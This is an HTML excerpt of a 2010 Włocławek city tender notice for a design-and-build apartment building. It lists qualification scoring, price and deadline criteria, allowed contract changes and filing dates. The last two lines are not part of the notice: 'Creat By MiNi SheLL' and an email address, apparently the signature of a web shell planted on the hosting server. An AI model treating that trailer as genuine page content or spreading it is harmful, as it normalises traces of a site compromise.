<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>1) posiadać niezbędna wiedzę i doświadczenie wrażające się wykonaniem w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówień odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, tj.: min. 1 robota budowlana  polegająca na budowie, w systemie zaprojektuj - wybuduj budynku wielomieszkaniowego (PKOB 1122)  o wartości minimum 4.000.000,00 PLN- znaczenie 60% - Sposób oceny: za każdy następny obiekt spełniający powyższy warunek 10 pkt. (max 60 pkt);
2) posiadać opłaconą polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  na min. 5.000.000,00 zł., - znaczenie 5% 
-Sposób oceny: za każde następne 5 mln zł 1 pkt. (max 5 pkt); 
3) posiadać przychód ze sprzedaży towarów i usług za ostatni rok obrotowy w wysokości nie mniejszej niż 10.000.000,00 zł. - znaczenie 30% - Sposób oceny: za każde następne 10 mln zł przychodu 10 pkt. (max 30 pkt); 
4) dysponować środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 3.000.000,00 zł. - znaczenie 5% - Sposób oceny: za każde następne 3 mln zł 1 pkt. (max 5 pkt);</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty , które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji: 1) udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia), 2) przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach: - rozszerzenia zakresu projektu wynikającego z warunków gestorów sieci i decyzji administracyjnych, - zwłoki instytucji opiniujących i uzgadniających ponad łączny czas wykonania przypisanych im czynności o czas równy tej zwłoce - wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, - pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, - wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie wykonania umowy w okresie dłuższym niż 20 dni kalendarzowych - potwierdzone pisemnie przez zamawiającego, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie - wystąpienie kolizji z istniejącymi sieciami koniecznymi do usunięcia w celu realizacji zadania podstawowego, czego nie można było przewidzieć w chwili zawarcia umowy. 3) zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron, 4) zmiany wynagrodzenia w przypadku ustawowej zamiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek, Wydział Inwestycji i Zamówień Publicznych, Zielony Rynek 11/13 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2010 godzina 14:00, miejsce: Urząd Miasta Włocławek, Zielony Rynek 11/13 - Biuro Obsługi Mieszkańców - hol budynku A - stanowisko d/s obsługi kancelaryjnej Prezydenta Miasta Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com